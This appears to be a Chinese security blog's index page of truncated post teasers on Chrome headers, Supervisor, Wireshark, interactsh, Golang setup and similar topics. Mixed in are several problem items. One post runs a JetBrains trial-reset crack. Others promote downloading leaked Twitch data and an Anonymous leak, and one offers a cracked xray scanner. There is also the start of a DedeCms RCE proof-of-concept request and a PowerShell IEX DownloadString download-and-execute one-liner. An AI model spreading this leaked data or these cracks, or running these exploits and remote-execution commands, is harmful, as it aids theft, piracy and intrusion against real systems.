前言：

不知从什么时候开始，chrome 浏览器的请求头(隐身模式一样)默认会添加上Sec-Ch-Ua、Sec-Ch-Ua-Mobile、Sec-Ch-Ua-Platform 等几个默认的头信息，大致样例信息如下：

Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="9...

前言：

在使用宝塔中的 Supervisor 来监控某些指定进程的时候，会有这种场景：我们需要定时重启监控的某个脚本或者子进程，重启又能不影响其他的子进程。

Supervisor简介：

Supervisor是用Python开发的一套通用的进程管理程序，能将一个普通的命令行进程变为后台daemon，并监控进程状态，异常退出时能自动重启。它是通过fork/exec的方式把这些被管理...

激活效果如下，分别是 pycharm 和 goland ：

只需要在终端执行（这里是 Mac，Windows 的自行更换安装路径即可）：

java -jar JetBrainsUnlimitedTrial-1.4-release-sha1-daf1682106e6aae5e40d0e6d3aaac3869cf469cc.jar u /Users/`whoami`/Librar...

interactsh 简介：

interactsh 是来自 github 上有名的开源软件组织 projectdiscovery 开发的一款在线反链检测（DNS盲注等等不回显的检测）平台，功能强大，包含 DNSLOG 的功能，且优于它。这个组织还开源了其他的有名的安全软件：httpx、nuclei、Subfinder 等；其开发语言皆是 golang 的，软件也多与网络并发相关，属于...

Mac 下安装好 wireshark 抓包软件后，打开会提示：you don't hava permission to capture on local interfaces. you can fix this by instaling ChmodBPF .可是当你按照提示安装好 ChmodBPF 后打开 wireshark 依然还是会提示你这个一样的错误。如下图：

解决办法...

重点：数据泄露.

疑似  Twitch.tv  的数据，根据种子名称看只是流露出的第一部分。各位自行下载斟酌。

下载方法在 之前的这篇文章说过了，不重复。

目录内容以及大小如下：

└── [5.1K]  twitch-leaks-part-one
    ├── [ 15K]  3rdparty.zip
    ├── [ 16M]  CPE-Chef.zip
...

昨天在一个老外的博客看到了他的一篇文章，讲的就是DedeCms 的预览版本 V5.8.1 存在 RCE 漏洞（远程代码执行漏洞）；我刚刚复现了下，确实是存在的。

POC：

GET /plus/flink.php?dopost=save&c=pwd HTTP/1.1
Host: dedecms.test
Pragma: no-cache
Cache-Control: n...

前言：

自己的服务器，或者是朋友的服务器，每次想编译 golang 的程序的时候，总是按照既定的步骤去官网下载-解压-安装-添加到环境变量里面，重复的劳动还是恼火。遂想自己写个安装脚本，但是在浏览 github 的时候，发现已经有人写好了的脚本，那就是 update-golang 。

简介：

update-golang 是国外的一些工程师写的一个安装 golang 或...

因为底层修改的原因，Parallels Desktop 15 无法在Big Sur上运行，最新的 Parallels Desktop 16 （有钱推荐正版，无此问题）在 Big Sur 下运行会有无法联网的问题，会提示“您的虚拟机将继续正常运作 但将无法连接网络。”，以及使用USB也会有问题。

一段时间都无法解决此问题，最新网上有一个别致的解决方案，可通过终端代码来启动Paralle...

前言：

有的时候我们访问某些网站，特别是对于证书过期或者是证书和域名不符合的时候，会提示：警告：面临潜在的安全风险！

Firefox 检测到潜在的安全威胁，因此没有继续访问 www.xxxx.com。若您访问此网站，攻击者可能会尝试窃取您的密码、电子邮件、信用卡等信息。

您可以做什么？

这个问题大多与网站有关，无法通过您的操作解决。您可以向此网站的管理者反馈此问题。
...

点进来的人也是想下载，不明白的就看 Anonymous 原文：

*****************************************************************************************
________                                     __   .__
\_____  \  _____...

首先感谢 长亭科技 提供 xray这款非常方便非常好用的安全工具

俗话说：没有人破解的工具不是好工具

根据没有任何数据支持的统计，大部分安全研究人员使用的安全工具都是盗版 包括但不限于： IDA\JEB\BurpSuite\Vmware

截至目前xray最新版的 1.4.2 crackedversion

MD5值：

文件: xray_windows_am...

简单的介绍下禅道：

禅道 项目管理软件 是国产的开源项目管理软件，专注研发项目管理，内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能，实现了软件的完整生命周期管理。

首先搭建环境，安装禅道12.4.2，开源版下载：https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html 。

我在Mac上使...

在上篇，我们说过红队技巧：隐藏windows服务，今天抽空来更新下，如何查找这类隐藏的Windows服务项。 首先看下效果，使用powershell远程下载执行直接获得隐藏的Windows服务名称：

powershell -c "IEX (New-Object Net.WebClient).DownloadString('h...